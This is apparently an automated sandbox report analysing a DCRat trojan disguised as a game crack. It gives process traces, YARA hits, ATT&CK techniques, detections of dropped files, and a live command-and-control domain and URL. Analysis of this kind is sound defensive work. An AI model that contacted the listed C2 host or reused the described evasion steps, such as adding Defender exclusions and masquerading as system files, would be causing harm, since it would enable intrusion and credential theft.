                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeQueries volume information: C:\portsurrogateFontCrt\BlockcontainerWin.exe VolumeInformation
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeQueries volume information: C:\portsurrogateFontCrt\BlockcontainerWin.exe VolumeInformation
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeQueries volume information: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe VolumeInformation
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeQueries volume information: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe VolumeInformation
                                    Source: C:\Program Files\Windows NT\smss.exeQueries volume information: C:\Program Files\Windows NT\smss.exe VolumeInformation
                                    Source: C:\Program Files\Windows NT\smss.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                    Source: C:\Program Files\Windows NT\smss.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Program Files\Windows NT\smss.exeQueries volume information: C:\Program Files\Windows NT\smss.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001DDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_001DDF1E
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001CB146 GetVersionExW,0_2_001CB146
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                    Source: smss.exe, 00000032.00000002.2204521543.000000001BEB1000.00000004.00000020.00020000.00000000.sdmp, smss.exe, 00000032.00000002.2197047875.000000001BE98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                    Source: C:\Program Files\Windows NT\smss.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                    Source: C:\Program Files\Windows NT\smss.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                                    Stealing of Sensitive Information

                                    barindex
                                    Source: Yara matchFile source: 5.2.BlockcontainerWin.exe.13585ce8.8.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000005.00000002.1537127203.0000000013585000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: BlockcontainerWin.exe PID: 7932, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: smss.exe PID: 7508, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: smss.exe PID: 5888, type: MEMORYSTR
                                    Source: Yara matchFile source: NursultanAlphaCrack.bat.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.NursultanAlphaCrack.bat.exe.6d37705.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.NursultanAlphaCrack.bat.exe.6d37705.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.NursultanAlphaCrack.bat.exe.7634705.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.BlockcontainerWin.exe.fd0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.1360056049.00000000075E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1358955428.0000000006CE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000005.00000000.1428074698.0000000000FD2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Program Files\Windows NT\smss.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\portsurrogateFontCrt\BlockcontainerWin.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe, type: DROPPED
                                    Source: Yara matchFile source: NursultanAlphaCrack.bat.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.NursultanAlphaCrack.bat.exe.6d37705.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.NursultanAlphaCrack.bat.exe.6d37705.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.NursultanAlphaCrack.bat.exe.7634705.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.BlockcontainerWin.exe.fd0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Program Files\Windows NT\smss.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\portsurrogateFontCrt\BlockcontainerWin.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe, type: DROPPED

                                    Remote Access Functionality

                                    barindex
                                    Source: Yara matchFile source: 5.2.BlockcontainerWin.exe.13585ce8.8.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000005.00000002.1537127203.0000000013585000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: BlockcontainerWin.exe PID: 7932, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: smss.exe PID: 7508, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: smss.exe PID: 5888, type: MEMORYSTR
                                    Source: Yara matchFile source: NursultanAlphaCrack.bat.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.NursultanAlphaCrack.bat.exe.6d37705.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.NursultanAlphaCrack.bat.exe.6d37705.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.NursultanAlphaCrack.bat.exe.7634705.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.BlockcontainerWin.exe.fd0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.1360056049.00000000075E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1358955428.0000000006CE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000005.00000000.1428074698.0000000000FD2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Program Files\Windows NT\smss.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\portsurrogateFontCrt\BlockcontainerWin.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe, type: DROPPED
                                    Source: Yara matchFile source: NursultanAlphaCrack.bat.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.NursultanAlphaCrack.bat.exe.6d37705.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.NursultanAlphaCrack.bat.exe.6d37705.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.NursultanAlphaCrack.bat.exe.7634705.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.BlockcontainerWin.exe.fd0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Program Files\Windows NT\smss.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\portsurrogateFontCrt\BlockcontainerWin.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe, type: DROPPED
                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity Information11
                                    Scripting
                                    Valid Accounts241
                                    Windows Management Instrumentation
                                    11
                                    Scripting
                                    1
                                    DLL Side-Loading
                                    11
                                    Disable or Modify Tools
                                    OS Credential Dumping1
                                    System Time Discovery
                                    Remote Services1
                                    Archive Collected Data
                                    2
                                    Ingress Tool Transfer
                                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts1
                                    Native API
                                    1
                                    DLL Side-Loading
                                    11
                                    Process Injection
                                    1
                                    Deobfuscate/Decode Files or Information
                                    LSASS Memory3
                                    File and Directory Discovery
                                    Remote Desktop ProtocolData from Removable Media1
                                    Encrypted Channel
                                    Exfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain Accounts1
                                    Exploitation for Client Execution
                                    Logon Script (Windows)Logon Script (Windows)2
                                    Obfuscated Files or Information
                                    Security Account Manager57
                                    System Information Discovery
                                    SMB/Windows Admin SharesData from Network Shared Drive3
                                    Non-Application Layer Protocol
                                    Automated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal Accounts2
                                    Command and Scripting Interpreter
                                    Login HookLogin Hook1
                                    Software Packing
                                    NTDS261
                                    Security Software Discovery
                                    Distributed Component Object ModelInput Capture13
                                    Application Layer Protocol
                                    Traffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                    DLL Side-Loading
                                    LSA Secrets1
                                    Process Discovery
                                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts113
                                    Masquerading
                                    Cached Domain Credentials151
                                    Virtualization/Sandbox Evasion
                                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items151
                                    Virtualization/Sandbox Evasion
                                    DCSync1
                                    Application Window Discovery
                                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                                    Process Injection
                                    Proc Filesystem1
                                    Remote System Discovery
                                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                                    System Network Configuration Discovery
                                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                    Hide Legend

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1590001 Sample: NursultanAlphaCrack.bat.exe Startdate: 13/01/2025 Architecture: WINDOWS Score: 100 107 237025cm.n9shteam.in 2->107 109 171.39.242.20.in-addr.arpa 2->109 115 Suricata IDS alerts for network traffic 2->115 117 Found malware configuration 2->117 119 Antivirus detection for URL or domain 2->119 121 16 other signatures 2->121 13 NursultanAlphaCrack.bat.exe 3 6 2->13         started        16 GKcQVcpwHdHgqKNzncXgLOYQsT.exe 2->16         started        19 BlockcontainerWin.exe 2->19         started        21 2 other processes 2->21 signatures3 process4 file5 97 C:\...\BlockcontainerWin.exe, PE32 13->97 dropped 23 wscript.exe 1 13->23         started        99 C:\Users\user\Desktop\ssnNFABl.log, PE32 16->99 dropped 101 C:\Users\user\Desktop\rEjFTmFn.log, PE32 16->101 dropped 103 C:\Users\user\Desktop\oCwXyDAs.log, PE32 16->103 dropped 105 7 other malicious files 16->105 dropped 113 Multi AV Scanner detection for dropped file 16->113 26 cmd.exe 16->26         started        signatures6 process7 signatures8 131 Windows Scripting host queries suspicious COM object (likely to drop second stage) 23->131 133 Suspicious execution chain found 23->133 28 cmd.exe 1 23->28         started        135 Uses ping.exe to sleep 26->135 30 conhost.exe 26->30         started        32 chcp.com 26->32         started        34 PING.EXE 26->34         started        process9 process10 36 BlockcontainerWin.exe 3 26 28->36         started        40 conhost.exe 28->40         started        file11 81 C:\Users\user\Desktop\sXGeTWEn.log, PE32 36->81 dropped 83 C:\Users\user\Desktop\qmbOMItv.log, PE32 36->83 dropped 85 C:\Users\user\Desktop\medFrqzz.log, PE32 36->85 dropped 87 12 other malicious files 36->87 dropped 123 Multi AV Scanner detection for dropped file 36->123 125 Adds a directory exclusion to Windows Defender 36->125 127 Creates processes via WMI 36->127 129 Drops PE files with benign system names 36->129 42 cmd.exe 36->42         started        45 powershell.exe 36->45         started        47 powershell.exe 23 36->47         started        49 4 other processes 36->49 signatures12 process13 signatures14 137 Uses ping.exe to sleep 42->137 139 Uses ping.exe to check the status of other devices and networks 42->139 51 smss.exe 42->51         started        69 3 other processes 42->69 141 Loading BitLocker PowerShell Module 45->141 55 conhost.exe 45->55         started        57 WmiPrvSE.exe 45->57         started        59 conhost.exe 47->59         started        61 conhost.exe 49->61         started        63 conhost.exe 49->63         started        65 conhost.exe 49->65         started        67 conhost.exe 49->67         started        process15 dnsIp16 111 237025cm.n9shteam.in 104.21.80.1, 49882, 52220, 80 CLOUDFLARENETUS United States 51->111 89 C:\Users\user\Desktop\wSzMZIas.log, PE32 51->89 dropped 91 C:\Users\user\Desktop\uQMeEZWw.log, PE32 51->91 dropped 93 C:\Users\user\Desktop\rfhNxLLD.log, PE32 51->93 dropped 95 7 other malicious files 51->95 dropped 71 cmd.exe 51->71         started        file17 process18 process19 73 conhost.exe 71->73         started        75 chcp.com 71->75         started        77 w32tm.exe 71->77         started        79 smss.exe 71->79         started       

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                    windows-stand
                                    SourceDetectionScannerLabelLink
                                    NursultanAlphaCrack.bat.exe73%VirustotalBrowse
                                    NursultanAlphaCrack.bat.exe63%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    NursultanAlphaCrack.bat.exe100%AviraVBS/Runner.VPG
                                    NursultanAlphaCrack.bat.exe100%Joe Sandbox ML
                                    SourceDetectionScannerLabelLink
                                    C:\Users\user\Desktop\EErUokRe.log100%AviraTR/PSW.Agent.qngqt
                                    C:\Program Files\Windows NT\smss.exe100%AviraTR/Spy.Agent.dbxid
                                    C:\Users\user\Desktop\BAOTDPUV.log100%AviraTR/AVI.Agent.updqb
                                    C:\Users\user\AppData\Local\Temp\DFtfeA2Uey.bat100%AviraBAT/Delbat.C
                                    C:\Users\user\AppData\Local\Temp\fDDEz4CMJh.bat100%AviraBAT/Delbat.C
                                    C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe100%AviraTR/Spy.Agent.dbxid
                                    C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe100%AviraTR/Spy.Agent.dbxid
                                    C:\Users\user\AppData\Local\Temp\PdP1UB7pUq.bat100%AviraBAT/Delbat.C
                                    C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe100%AviraTR/Spy.Agent.dbxid
                                    C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe100%AviraTR/Spy.Agent.dbxid
                                    C:\Users\user\Desktop\BOAdhoQl.log100%AviraTR/AVI.Agent.updqb
                                    C:\Users\user\Desktop\EErUokRe.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\JRLLnIaC.log100%Joe Sandbox ML
                                    C:\Program Files\Windows NT\smss.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe100%Joe Sandbox ML
                                    C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe79%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Program Files\Windows NT\smss.exe79%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe79%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Program Files\WindowsPowerShell\GKcQVcpwHdHgqKNzncXgLOYQsT.exe79%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe79%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\BAOTDPUV.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\BOAdhoQl.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\BwtLSSWj.log25%ReversingLabs
                                    C:\Users\user\Desktop\DYilKdVO.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\EErUokRe.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\JDNtgNEK.log29%ReversingLabs
                                    C:\Users\user\Desktop\JRLLnIaC.log8%ReversingLabs
                                    C:\Users\user\Desktop\OfbStevG.log29%ReversingLabs
                                    C:\Users\user\Desktop\Rfxshdov.log25%ReversingLabs
                                    C:\Users\user\Desktop\USBzXUek.log12%ReversingLabs
                                    C:\Users\user\Desktop\VlKreyqd.log5%ReversingLabs
                                    C:\Users\user\Desktop\ZFTyARuY.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\ZTFIdpqp.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\blWilNVX.log12%ReversingLabs
                                    C:\Users\user\Desktop\gDHycgoN.log11%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                                    C:\Users\user\Desktop\kHvGrYKy.log29%ReversingLabs
                                    C:\Users\user\Desktop\lhCxVqkE.log25%ReversingLabs
                                    C:\Users\user\Desktop\medFrqzz.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\npqXqOLK.log11%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                                    C:\Users\user\Desktop\oCwXyDAs.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\qmbOMItv.log8%ReversingLabs
                                    C:\Users\user\Desktop\rEjFTmFn.log11%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                                    C:\Users\user\Desktop\rfhNxLLD.log5%ReversingLabs
                                    C:\Users\user\Desktop\sXGeTWEn.log5%ReversingLabs
                                    C:\Users\user\Desktop\ssnNFABl.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\uQMeEZWw.log12%ReversingLabs
                                    C:\Users\user\Desktop\wSzMZIas.log8%ReversingLabs
                                    C:\portsurrogateFontCrt\BlockcontainerWin.exe79%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    No Antivirus matches
                                    No Antivirus matches
                                    SourceDetectionScannerLabelLink
                                    http://237025cm.n9shteam.in100%Avira URL Cloudmalware
                                    http://237025cm.n9shteam.in/UpdatesqlCdn.php100%Avira URL Cloudmalware
                                    http://237025cm.n9shteam.in/100%Avira URL Cloudmalware
                                    NameIPActiveMaliciousAntivirus DetectionReputation
                                    237025cm.n9shteam.in
                                    104.21.80.1
                                    truetrue
                                      unknown
                                      s-part-0017.t-0009.fb-t-msedge.net
                                      13.107.253.45
                                      truefalse
                                        high
                                        171.39.242.20.in-addr.arpa
                                        unknown
                                        unknownfalse
                                          high
                                          NameMaliciousAntivirus DetectionReputation
                                          http://237025cm.n9shteam.in/UpdatesqlCdn.phptrue
                                          • Avira URL Cloud: malware
                                          unknown
                                          NameSourceMaliciousAntivirus DetectionReputation
                                          http://nuget.org/NuGet.exepowershell.exe, 0000001D.00000002.2776439903.0000019F90077000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000021.00000002.1630582447.000001DBD7E87000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000018.00000002.1624574475.0000023D2C6C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1624440544.000002C588F88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1623450496.000001FE16D08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1611859711.0000019F80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1629527995.00000212E3A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1630582447.000001DBD7E87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://237025cm.n9shteam.inGKcQVcpwHdHgqKNzncXgLOYQsT.exe, 00000026.00000002.2018322242.0000000002A79000.00000004.00000800.00020000.00000000.sdmp, GKcQVcpwHdHgqKNzncXgLOYQsT.exe, 00000026.00000002.2018322242.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, smss.exe, 00000032.00000002.1657980765.00000000035AA000.00000004.00000800.00020000.00000000.sdmp, smss.exe, 00000032.00000002.1657980765.0000000003358000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000021.00000002.1630582447.000001DBD7E87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000018.00000002.1624574475.0000023D2C6C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1624440544.000002C588F88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1623450496.000001FE16D08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1611859711.0000019F80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1629527995.00000212E3A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1630582447.000001DBD7E87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://contoso.com/powershell.exe, 0000001D.00000002.2776439903.0000019F90077000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://nuget.org/nuget.exepowershell.exe, 00000018.00000002.2983617268.0000023D3C516000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2984347585.000002C598DD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2966511703.000001FE26B56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2776439903.0000019F90077000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://contoso.com/Licensepowershell.exe, 0000001D.00000002.2776439903.0000019F90077000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://contoso.com/Iconpowershell.exe, 0000001D.00000002.2776439903.0000019F90077000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://aka.ms/pscore68powershell.exe, 00000018.00000002.1624574475.0000023D2C4A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1624440544.000002C588D61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1623450496.000001FE16AE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1611859711.0000019F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1629527995.00000212E37F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1630582447.000001DBD7C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameBlockcontainerWin.exe, 00000005.00000002.1496547817.0000000003B68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1624574475.0000023D2C4A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1624440544.000002C588D61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1623450496.000001FE16AE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1611859711.0000019F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1629527995.00000212E37F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1630582447.000001DBD7C61000.00000004.00000800.00020000.00000000.sdmp, GKcQVcpwHdHgqKNzncXgLOYQsT.exe, 00000026.00000002.2018322242.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, smss.exe, 00000032.00000002.1657980765.0000000003358000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://github.com/Pester/Pesterpowershell.exe, 00000021.00000002.1630582447.000001DBD7E87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://237025cm.n9shteam.in/smss.exe, 00000032.00000002.1657980765.0000000003358000.00000004.00000800.00020000.00000000.sdmptrue
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  104.21.80.1
                                                                  237025cm.n9shteam.inUnited States
                                                                  13335CLOUDFLARENETUStrue
                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                  Analysis ID:1590001
                                                                  Start date and time:2025-01-13 13:15:52 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 10m 55s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:67
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
